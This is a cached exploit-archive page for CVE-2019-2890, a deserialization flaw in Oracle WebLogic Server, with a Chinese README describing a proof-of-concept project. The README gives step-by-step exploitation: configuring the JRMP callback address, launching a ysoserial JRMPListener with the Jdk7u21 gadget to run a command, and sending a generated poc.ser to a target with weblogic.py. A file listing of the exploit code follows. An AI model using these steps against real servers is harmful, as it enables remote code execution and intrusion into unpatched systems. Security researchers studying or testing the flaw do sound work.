Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-2890 PoC — Oracle Fusion Middleware WebLogic Server组件安全漏洞

Source
Associated Vulnerability
Title:Oracle Fusion Middleware WebLogic Server组件安全漏洞 (CVE-2019-2890)
Description:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的WebLogic Server 10.3.6.0.0版本、12.1.3.0.0版本和12.2.1.3.0版本的Web Services组件存在安全漏洞。攻击者可利用该漏洞控制WebLogic S
Description
0-sec.org
Readme
## 声明

仅用于学习交流使用,其他用途后果自负。

## 说明

已经将相关jar文件都导入到了项目中,并且利用方式采用yso的JRMP,学习调试时候可以修改利用方式。

首先需要将weblogic下的 **SerializedSystemIni.dat** 文件放置到 **security** 文件夹下。

然后需要将yso重命名为 **ysoserial.jar** ,并且导入到 **lib** 目录下。

![1](./img/3.png)

其次 **weblogic/wsee/jaxws/persistence/PersistentContext.java** 中的 **getObject** 的IP地址和端口。

```
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }
```

最后远程通过JRMP监听,利用7u21命令执行。

```
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
```

使用方法,运行Poc.java生成poc.ser序列化文件,通过

```
python weblogic.py ip port poc.ser
```

![1](./img/1.png)

![1](./img/2.png)

File Snapshot

[4.0K] /data/pocs/b5b5264dab6b5f6213e8a221d535d5a4407273ec ├── [ 882] CVE-2019-2890.iml ├── [4.0K] img │   ├── [502K] 1.png │   ├── [ 97K] 2.png │   └── [127K] 3.png ├── [4.0K] libs │   ├── [ 99K] com.bea.core.logging_1.9.0.0.jar │   ├── [104K] com.bea.core.management.core_2.9.0.1.jar │   ├── [1.4M] com.oracle.core.weblogic.msgcat_1.2.0.0.jar │   ├── [2.4M] cryptoj.jar │   ├── [872K] glassfish.jaxb_1.1.0.0_2-1-14.jar │   └── [3.1M] wlthint3client.jar ├── [ 997] README.md ├── [4.0K] src │   └── [4.0K] weblogic │   └── [4.0K] wsee │   └── [4.0K] jaxws │   └── [4.0K] persistence │   ├── [1.4K] EncryptionUtil.java │   ├── [9.0K] PersistentContext.java │   └── [1.9K] Poc.java └── [5.3K] weblogic.py 7 directories, 15 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.